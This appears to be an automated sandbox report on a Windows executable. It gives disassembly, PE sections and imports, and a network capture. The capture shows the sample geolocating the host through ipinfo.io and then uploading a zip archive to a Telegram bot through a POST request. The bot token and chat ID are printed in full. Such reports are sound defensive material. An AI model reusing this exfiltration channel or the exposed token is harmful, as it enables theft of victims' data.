add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [ebp-08h], 00000000h
mov dword ptr [ebp-0Ch], 00000000h
dec eax
lea eax, dword ptr [ebp-000000C0h]
inc ecx
mov eax, 00000068h
mov edx, 00000000h
dec eax
mov ecx, eax
call 00007FFA3C554846h
dec eax
mov eax, dword ptr [00029E2Ah]
mov eax, dword ptr [eax]
test eax, eax
je 00007FFA3C530035h
dec eax
lea eax, dword ptr [ebp-000000C0h]
dec eax
mov ecx, eax
dec eax
mov eax, dword ptr [0003F1EBh]
call eax
dec eax
mov dword ptr [ebp-18h], 00000000h
mov dword ptr [ebp-24h], 00000030h
mov eax, dword ptr [ebp-24h]
dec eax
mov eax, dword ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x40000	0xc28	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2d000	0xfa8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x40300	0x2b0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x254c8	0x25600	False	0.4375261287625418	data	6.230696995826098	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x27000	0x140	0x200	False	0.185546875	data	1.06169541172863	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x28000	0x3f00	0x4000	False	0.28070068359375	data	5.361792201240817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.eh_fram	0x2c000	0x4	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2d000	0xfa8	0x1000	False	0.49169921875	data	5.275107219845029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x2e000	0x10dc	0x1200	False	0.23177083333333334	shared library	4.439285848535804	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x30000	0xfc80	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x40000	0xc28	0xe00	False	0.31417410714285715	data	3.8374507523409167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x41000	0x68	0x200	False	0.072265625	data	0.2843074176589459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x42000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.dll	CloseHandle, CreateDirectoryW, CreateFileW, CreateProcessW, DeleteCriticalSection, EnterCriticalSection, FormatMessageA, FreeLibrary, GenerateConsoleCtrlEvent, GetCommandLineW, GetCurrentProcessId, GetExitCodeProcess, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetProcAddress, GetProcessId, GetStartupInfoA, GetSystemTimeAsFileTime, GetTempPathW, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, ReadFile, SetConsoleCtrlHandler, SetEnvironmentVariableA, SetFilePointer, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
msvcrt.dll	__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __argv, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _putws, _unlock, _wcsicmp, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, mbstowcs, memcpy, memmove, memset, puts, signal, strerror, strlen, strncmp, strncpy, vfprintf, wcslen
SHELL32.dll	CommandLineToArgvW, SHFileOperationW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2023 13:40:03.990644932 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:03.990746975 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:03.990837097 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:03.992069006 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:03.992110968 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.066904068 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.067769051 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.067853928 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.069613934 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.069700956 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.071506977 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.071624041 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.071738005 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.071769953 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.117836952 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.227171898 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.227368116 CEST	443	49705	34.117.59.81	192.168.2.4
Sep 1, 2023 13:40:04.227475882 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:04.228296995 CEST	49705	443	192.168.2.4	34.117.59.81
Sep 1, 2023 13:40:10.466976881 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.467052937 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.467171907 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.468185902 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.468226910 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.541923046 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.542623997 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.542687893 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.543992996 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.544121981 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.545370102 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.545475006 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.545629025 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.545654058 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.545767069 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.545798063 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.545815945 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.545994997 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546039104 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546241045 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546299934 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546488047 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546529055 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546591997 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546621084 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546693087 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546730042 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546756983 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546777010 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546847105 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546847105 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546847105 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.546883106 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546915054 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546938896 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.546986103 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547007084 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547049999 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547072887 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547117949 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547142982 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547182083 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547229052 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547281027 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547281027 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547307014 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547334909 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547380924 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547405958 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547435999 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547456026 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547501087 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547522068 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547574043 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547595978 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547615051 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547631979 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547688961 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547715902 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.547761917 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547817945 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547858953 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547889948 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547934055 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547985077 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.547985077 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548027992 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548080921 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548124075 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548180103 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548199892 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548271894 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548319101 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548348904 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548425913 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548486948 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.548513889 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.591538906 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.591965914 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.592036963 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.592086077 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.592111111 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:10.592125893 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:10.592137098 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:11.016801119 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:11.017069101 CEST	443	49706	149.154.167.220	192.168.2.4
Sep 1, 2023 13:40:11.017177105 CEST	49706	443	192.168.2.4	149.154.167.220
Sep 1, 2023 13:40:11.018079996 CEST	49706	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2023 13:40:03.957787991 CEST	60316	53	192.168.2.4	8.8.8.8
Sep 1, 2023 13:40:03.978313923 CEST	53	60316	8.8.8.8	192.168.2.4
Sep 1, 2023 13:40:10.439361095 CEST	51816	53	192.168.2.4	8.8.8.8
Sep 1, 2023 13:40:10.463136911 CEST	53	51816	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2023 13:40:03.957787991 CEST	192.168.2.4	8.8.8.8	0xe357	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Sep 1, 2023 13:40:10.439361095 CEST	192.168.2.4	8.8.8.8	0xe78b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2023 13:40:03.978313923 CEST	8.8.8.8	192.168.2.4	0xe357	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Sep 1, 2023 13:40:10.463136911 CEST	8.8.8.8	192.168.2.4	0xe78b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49705	34.117.59.81	443	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Timestamp	Direction	Data
2023-09-01 11:40:04 UTC	OUT	GET /json HTTP/1.1 Accept-Encoding: identity Host: ipinfo.io User-Agent: Python-urllib/3.9 Connection: close
2023-09-01 11:40:04 UTC	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-content-type-options: nosniff content-type: application/json; charset=utf-8 content-length: 291 date: Fri, 01 Sep 2023 11:40:04 GMT x-envoy-upstream-service-time: 2 strict-transport-security: max-age=2592000; includeSubDomains vary: Accept-Encoding Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-09-01 11:40:04 UTC	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 32 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 35 32 2d 34 32 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 5a c3 bc 72 69 63 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 33 38 37 36 2c 38 2e 35 32 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 38 30 30 35 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65 Data Ascii: { "ip": "84.17.52.42", "hostname": "unn-84-17-52-42.cdn77.com", "city": "Zrich", "region": "Zurich", "country": "CH", "loc": "47.3876,8.5207", "org": "AS212238 Datacamp Limited", "postal": "8005", "timezone": "Europe/Zurich", "readme

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49706	149.154.167.220	443	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Timestamp	kBytes transferred	Direction	Data
2023-09-01 11:40:10 UTC	0	OUT	POST /bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument HTTP/1.1 Accept-Encoding: identity Content-Length: 656063 Host: api.telegram.org User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 Content-Type: multipart/form-data; boundary=4c49b1f3a67a4c2585c4e333b5fb8eab Connection: close
2023-09-01 11:40:10 UTC	1	OUT	Data Raw: 2d 2d 34 63 34 39 62 31 66 33 61 36 37 61 34 63 32 35 38 35 63 34 65 33 33 33 62 35 66 62 38 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 37 38 30 34 34 30 30 31 0d 0a 2d 2d 34 63 34 39 62 31 66 33 61 36 37 61 34 63 32 35 38 35 63 34 65 33 33 33 62 35 66 62 38 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 2d 73 74 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 0d 0a 50 4b Data Ascii: --4c49b1f3a67a4c2585c4e333b5fb8eabContent-Disposition: form-data; name="chat_id"278044001--4c49b1f3a67a4c2585c4e333b5fb8eabContent-Disposition: form-data; name="document"; filename="user-st.zip"Content-Type: application/x-zip-compressedPK
2023-09-01 11:40:10 UTC	17	OUT	Data Raw: 46 03 23 c9 4f d2 aa 27 bd 35 3b f3 0e fb 4f 31 9f d6 c8 40 e7 3e 19 d7 93 49 54 9a 62 a2 eb 6e cd c9 c9 6c 3f 97 75 44 93 61 1f f5 9e 95 23 fb 65 1e b7 b9 af 6f 16 9b 56 a0 65 72 77 74 c1 8a 60 d3 75 ec f8 c7 a6 97 f8 ae ba 38 19 98 29 9c 7f 3e 5f 79 dd e9 f2 c3 4a bd b9 73 e8 4f 9a e5 7f 75 5c be b5 5f 78 f2 f0 bc 9f ca cd 86 29 3d 63 c5 37 ef 6a 1e 4e 9d 38 ea 90 de c9 ba 27 3d 9c 76 55 44 3a 74 66 ba 07 43 aa 21 de cc 58 b5 89 71 bb ce 42 39 47 bb 93 42 bc 3f 97 d7 75 46 01 d0 d1 0f c5 07 31 5f 3e 1c 4d 7c 7f 5b f4 d7 21 33 d2 ef 46 46 3d 33 93 18 5e fa 56 41 cf ff 30 cd 7b 4c 6e 49 32 91 e4 76 da 7c d1 84 ee 0f ca cc d5 ff 0d c7 42 2d c7 fd 86 3b f9 bb da 97 46 3f 5d de 96 47 12 b7 d7 29 da 03 d9 35 ad f9 6f bf bf ba 08 09 71 a5 5f fe 78 53 f9 c6 2b Data Ascii: F#O'5;O1@>ITbnl?uDa#eoVerwt`u8)>_yJsOu\_x)=c7jN8'=vUD:tfC!XqB9GB?uF1_>M\|[!3FF=3^VA0{LnI2v\|B-;F?]G)5oq_xS+
2023-09-01 11:40:10 UTC	33	OUT	Data Raw: 72 a2 78 39 19 ee ff e7 a9 18 77 9d 41 c3 52 12 d3 93 58 7d 5c b8 3f c4 c5 62 f0 bf 63 d6 24 e1 c3 30 a4 f1 12 ed 3a a7 0a 23 56 b3 34 1d 8a bc 87 c9 6d ab 2c 79 2d eb e1 c4 d2 f3 0d e2 c0 34 5a 8c 77 0f 08 c8 80 99 c3 a3 47 b6 77 60 9b ac 92 73 7c 78 38 45 72 b3 90 74 3c ae 38 b9 a3 f3 3b 1f c1 bf e4 6f 34 8b 85 b2 4f 63 be cc 15 f4 41 ba c5 5c 7a 64 3f 7a cd 06 96 c7 6b 62 ce 21 eb ba e7 2f c1 68 7f 09 11 3a 6f 2b 8d 1c 97 15 a8 31 cd af 7e c4 c8 62 d6 7c 1f 64 6c 04 85 5d 53 15 f7 45 97 75 b0 99 ec 06 fc ae 06 31 a0 50 7f 48 f7 2e b8 ec eb 32 32 89 52 fb 17 f0 fd 29 9d d5 41 9a 97 93 df fc bb 0b bf a3 61 8d b4 c7 ae c9 34 5b cd 8d 73 ca cb 17 39 89 e2 85 56 4c 58 11 9b 6b be 62 79 cd cb 67 83 cc 43 f7 89 e9 1b 36 c3 59 62 02 57 7a 32 f2 ea 83 72 9a ca Data Ascii: rx9wARX}\?bc$0:#V4m,y-4ZwGw`s\|x8Ert<8;o4OcA\zd?zkb!/h:o+1~b\|dl]SEu1PH.22R)Aa4[s9VLXkbygC6YbWz2r
